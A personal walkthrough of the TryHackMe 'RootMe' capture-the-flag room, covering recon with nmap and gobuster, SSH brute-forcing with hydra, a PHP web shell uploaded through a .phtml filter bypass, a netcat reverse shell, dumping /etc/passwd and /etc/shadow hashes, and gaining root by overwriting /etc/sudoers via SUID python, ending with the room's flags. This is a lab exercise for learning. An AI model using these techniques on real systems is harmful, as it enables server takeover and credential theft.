rootme

https://tryhackme.com/room/rrootme

ROOTME WRITEUP

By Jacvbtaylor

           Used openvpn and Kali Linux 
                     https://tryhackme.com/room/rrootme
             completed August 30, 2022

Step 1:

nmap -sn -v 10.10.52.28 -oG - | awk '/Up$/{print $2}' >> livehosts.txt && nmap -v -A -iL livehosts.txt >> nmapscans.txt

This script I wrote scans the host (or subnets if applied) and puts the IP(s) into a txt file that have responded and are up. Nmap takes that file and scans the hosts that are running, putting those results into a different txt (This script is very helpful when scanning a network as apposed to a single machine, but I still like to use it).

Once I have established a good baseline of what is running and open on the target, I will start another scan to look for vulnerabilites on that machine while I check out the rest of the open ports.

nmap -v -sV --script vulners 10.10.52.28 > vulnscan.txt

In this case, port 22 and 80 and running. There is a webpage for 10.10.52.28, but nothing to interact with for this index.

Step 2:

I tried running a directory attack using dirb, with no luck. I stopped it after about 10 minutes to switch to this

gobuster dir -u http://10.10.52.28 -w /usr/share/wordlists/dirb/common.txt

which resulted in a much faster and successful outcome. With this, I can gravitate toward the status 301 results.

• /.hta (Status: 403) [Size: 276]

• /.htpasswd (Status: 403) [Size: 276]

• /.htaccess (Status: 403) [Size: 276]

• /css (Status: 301) [Size: 308] [–> http://10.10.52.28/css/]

• /index.php (Status: 200) [Size: 616]

• /js (Status: 301) [Size: 307] [–> http://10.10.52.28/js/]

• /panel (Status: 301) [Size: 310] [–> http://10.10.52.28/panel/]

• /server-status (Status: 403) [Size: 276]

• /uploads (Status: 301) [Size: 312] [–> http://10.10.52.28/uploads/]

Browsing to http://10.10.52.28/panel/ brings me to a page where I can upload files. I tested this out with a random txt file from my machine. I uploaded it and changed my URL to http://10.10.52.28/uploads which showed me an index of the files in that folder.

Step 3:

This has a lot of potential, but while I try to exploit this, I ran a bruteforce on the SSH port in the event I may be able to discover an existing username and password

hydra -L /usr/share/metasploit-framework/data/wordlists/namelist.txt -P /usr/share/wordlists/rockyou.txt ssh://10.10.52.28 -v -F -t 4

While this runs in the background, I began to think of the kind of files I can upload.

I started by creating a php file called cmd.php

<?php
  $command = $_GET['cmd'];
  echo system($command);
  ?>

Step 4:

The server responding with a message saying PHP is prohibited.

I uploaded the same file but with name cmd.php.jpg and this uploaded successfully. I am unable to execute the code with that extension so my next step is to figure out if there are other valid extension that will allow PHP to run.

I changed the name to cmd.phtml, uploaded, visited the url http://10.10.52.28/uploads/cmd.phtml and was greeted with a blank page.

It worked! Next step is to test commands.

http://10.10.52.28/uploads/cmd.phtml?cmd=ls

cmd.php.jpg cmd.phtml eth0.txt eth0.txt

http://10.10.52.28/uploads/cmd.phtml?cmd=whoami

www-data www-data

Step 5:

Next step is to try and run some scripts. I first encoded this cd …/…/…/ && ls

http://10.10.52.28/uploads/cmd.phtml?cmd=cd …%2F…%2F…%2F %26%26 ls

backups cache crash lib local lock log mail opt run snap spool tmp www www

http://10.10.52.28/uploads/cmd.phtml?cmd=cat %2Fetc%2Fpasswd

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false rootme:x:1000:1000:RootMe:/home/rootme:/bin/bash sshd:x:110:65534::/run/sshd:/usr/sbin/nologin test:x:1001:1001:,,,:/home/test:/bin/bash test:x:1001:1001:,,,:/home/test:/bin/bash

This was a lot of info, so to simplify, I ran

http://10.10.52.28/uploads/cmd.phtml?cmd=cat %2Fetc%2Fpasswd | awk -F "%3A" '{print%241}'

root daemon bin sys sync games man lp mail news uucp proxy www-data backup list irc gnats nobody systemd-network systemd-resolve syslog messagebus _apt lxd uuidd dnsmasq landscape pollinate rootme sshd test test

Step 6:

This output all of the users for the server. This may come in handy for the SSH bruteforce but we can still maybe exploit the server more through this file upload. Maybe a PHP reverse shell?

Before trying that, I stopped my SSH bruteforce and changed the script to a valid username

hydra -l rootme -P /usr/share/wordlists/rockyou.txt ssh://10.10.52.28 -v -F -t 4

Again, I am going to let this run while I explore more options.

The last thing I wanted to try with the URL cmd’s was to find who the sudo users are

http://10.10.52.28/uploads/cmd.phtml?cmd=getent group | grep sudo

sudo:x:27:rootme sudo:x:27:rootme

Step 7:

Now to create a reverse shell. I was able to make a new phtml file embedded with pentest monkey’s PHP reverse shell, uploading it to the site from the panel page and then running this script before running the file from the browser

ufw allow from 10.10.10.28 proto tcp to any port 1234 && nc -lnvp 4334

It worked!

listening on [any] 4334 … connect to [10.2.12.19] from (UNKNOWN) [10.10.52.28] 52082 Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 21:33:01 up 1:41, 0 users, load average: 0.00, 0.01, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can’t access tty; job control turned off $ whoami www-data

Step 8:

Now comes the hard part. This is my first time being stuck as the www user. We have no sudo privileges. After some researching, I came across a possibility of an SUID escalation. To see the files with SUID permissions, I ran this:

$ find / -perm -u=s -type f 2>/dev/null /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/snapd/snap-confine /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/policykit-1/polkit-agent-helper-1 /usr/bin/traceroute6.iputils /usr/bin/newuidmap /usr/bin/newgidmap /usr/bin/chsh /usr/bin/python /usr/bin/at /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/bin/newgrp /usr/bin/passwd /usr/bin/pkexec /snap/core/8268/bin/mount /snap/core/8268/bin/ping /snap/core/8268/bin/ping6 /snap/core/8268/bin/su /snap/core/8268/bin/umount /snap/core/8268/usr/bin/chfn /snap/core/8268/usr/bin/chsh /snap/core/8268/usr/bin/gpasswd /snap/core/8268/usr/bin/newgrp /snap/core/8268/usr/bin/passwd /snap/core/8268/usr/bin/sudo /snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core/8268/usr/lib/openssh/ssh-keysign /snap/core/8268/usr/lib/snapd/snap-confine /snap/core/8268/usr/sbin/pppd /snap/core/9665/bin/mount /snap/core/9665/bin/ping /snap/core/9665/bin/ping6 /snap/core/9665/bin/su /snap/core/9665/bin/umount /snap/core/9665/usr/bin/chfn /snap/core/9665/usr/bin/chsh /snap/core/9665/usr/bin/gpasswd /snap/core/9665/usr/bin/newgrp /snap/core/9665/usr/bin/passwd /snap/core/9665/usr/bin/sudo /snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core/9665/usr/lib/openssh/ssh-keysign /snap/core/9665/usr/lib/snapd/snap-confine /snap/core/9665/usr/sbin/pppd /bin/mount /bin/su /bin/fusermount /bin/ping /bin/umount

using the list output from the last command, I cross referenced the list here https://gtfobins.github.io/#+suid . To make it a little easier to cross reference, I spent way too long sorting the information by creating this script that puts the files I need to read MOSTLY in alphabetical order

find / -perm -u=s -type f 2>/dev/null | sed -e 's/snap\/core//g;s/\/9//g;s/\/6//;s/bin//;s/\/8//g' | awk -F "/" '{print$3,$4,$5}' | sed -e 's/usr//;s/lib//g' | sort

Step 9:

Python seems to be the only match to have SUID privileges. I loaded a shell using Python

$ whoami www-data $ su rootme su: must be run from a terminal $ python -c 'import os; os.system("/bin/sh")'

Same outcome as the reverse PHP shell. Still stuck as the www user for now.

whoami www-data id uid=33(www-data) gid=33(www-data) groups=33(www-data) su su: must be run from a terminal su rootme su: must be run from a terminal

Step 10:

Referencing https://rastating.github.io/privilege-escalation-via-python-library-hijacking/ it seems there may be a possibility of hijacking a library. This seems promising, but only if we discover some cron jobs ran by root a file or folder that we can write to for the python library.

python -c 'import sys; print "\n".join(sys.path)'

/usr/lib/python2.7 /usr/lib/python2.7/plat-x86_64-linux-gnu /usr/lib/python2.7/lib-tk /usr/lib/python2.7/lib-old /usr/lib/python2.7/lib-dynload /usr/local/lib/python2.7/dist-packages /usr/lib/python2.7/dist-packages

After trying what felt like everything, I was finally able to get access to the shadow file using this python script

python -c 'print(open("/etc/shadow").read())'

root:$6$5osB44J2$24WV3zAR1FTqEq3f2kSqrigUgyDmKucU8rwHvbOJWxIoWSlHbVHV1Ug1eOHqidieZWDU3Y5V3cimChun2JYNw1:18478:0:99999:7::: daemon::18295:0:99999:7::: bin::18295:0:99999:7::: sys::18295:0:99999:7::: sync::18295:0:99999:7::: games::18295:0:99999:7::: man::18295:0:99999:7::: lp::18295:0:99999:7::: mail::18295:0:99999:7::: news::18295:0:99999:7::: uucp::18295:0:99999:7::: proxy::18295:0:99999:7::: www-data::18295:0:99999:7::: backup::18295:0:99999:7::: list::18295:0:99999:7::: irc::18295:0:99999:7::: gnats::18295:0:99999:7::: nobody::18295:0:99999:7::: systemd-network::18295:0:99999:7::: systemd-resolve::18295:0:99999:7::: syslog::18295:0:99999:7::: messagebus::18295:0:99999:7::: _apt::18295:0:99999:7::: lxd::18295:0:99999:7::: uuidd::18295:0:99999:7::: dnsmasq::18295:0:99999:7::: landscape::18295:0:99999:7::: pollinate::18295:0:99999:7::: rootme:$6$jzeDDmrVeqMMEQqv$j8jwWy951YwWBJWzQNn.A45I.8H06/QOv4qocX.hNDdT42NytyavSHxlxoEh0ek2OS4NX27tuuZRTJuHPSWCp.:18478:0:99999:7::: sshd::18478:0:99999:7::: test:$6$vXOyvOWZ$UpIjnJq/KuKmKHezW/pEM.nrI6QuqhWWlv/fUmLvJI1YG7nju2vpP3vg1Q0SSf5FCk8058WD5Rc3XXPMRlqHb0:18478:0:99999:7:::

Step 11:

python -c 'print(open("/etc/shadow").read())' | cat /etc/shadow | awk -F ":" '{print$1,$2}' | sed -n '/*/!p;/!/!p' > hashes

ls hashes cat hashes

root $6$5osB44J2$24WV3zAR1FTqEq3f2kSqrigUgyDmKucU8rwHvbOJWxIoWSlHbVHV1Ug1eOHqidieZWDU3Y5V3cimChun2JYNw1
rootme $6$jzeDDmrVeqMMEQqv$j8jwWy951YwWBJWzQNn.A45I.8H06/QOv4qocX.hNDdT42NytyavSHxlxoEh0ek2OS4NX27tuuZRTJuHPSWCp.
test $6$vXOyvOWZ$UpIjnJq/KuKmKHezW/pEM.nrI6QuqhWWlv/fUmLvJI1YG7nju2vpP3vg1Q0SSf5FCk8058WD5Rc3XXPMRlqHb0

sed 's/ /:/g' hashes > userhash cat userhash

root:$6$5osB44J2$24WV3zAR1FTqEq3f2kSqrigUgyDmKucU8rwHvbOJWxIoWSlHbVHV1Ug1eOHqidieZWDU3Y5V3cimChun2JYNw1
rootme:$6$jzeDDmrVeqMMEQqv$j8jwWy951YwWBJWzQNn.A45I.8H06/QOv4qocX.hNDdT42NytyavSHxlxoEh0ek2OS4NX27tuuZRTJuHPSWCp.
test:$6$vXOyvOWZ$UpIjnJq/KuKmKHezW/pEM.nrI6QuqhWWlv/fUmLvJI1YG7nju2vpP3vg1Q0SSf5FCk8058WD5Rc3XXPMRlqHb0

I got the password hashes! I thought this was going to be smooth sailing from here, but I thought wrong. I tried using john the ripper to crack any of the 3 password hashes I collected, but still no luck.

Step 12:

I thought back to what I had done to even get that information in the first place. I used python to open a file, what’s stopping me from writing to one??

python -c 'open("/etc/sudoers","w+").write("www-data ALL=(ALL) NOPASSWD:ALL")' sudo -i mesg: ttyname failed: Inappropriate ioctl for device su whoami root passwd www-data Enter new UNIX password: test Retype new UNIX password: test passwd: password updated successfully

I finally moved up a user! The PHP shell we are still operating from is limited to certain commands, so I wanted to try my best to get an SSH login with my www user, but kept getting kicked out after logging in.

root㉿kali)-[/home/kali/rootme] └─# ssh www-data@10.10.52.28 -p 22 www-data@10.10.52.28's password: Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64) System information as of Wed Aug 31 00:06:05 UTC 2022 System load: 0.11 Processes: 115 Usage of /: 20.5% of 19.56GB Users logged in: 0 Memory usage: 44% IP address for eth0: 10.10.52.28 Swap usage: 0% Last login: Wed Aug 31 00:05:41 2022 from 10.2.12.19 This account is currently not available. Connection to 10.10.52.28 closed. ┌──(root㉿kali)-[/home/kali/rootme] └─#

Step 13:

Oh well. Going back to the PHP shell, I located the user.txt file in /var/www

THM{y0u_g0t_a_sh3ll}

Lastly, I needed to locate the root.txt file

pwd /root ls root.txt cat root.txt

THM{pr1v1l3g3_3sc4l4t10n}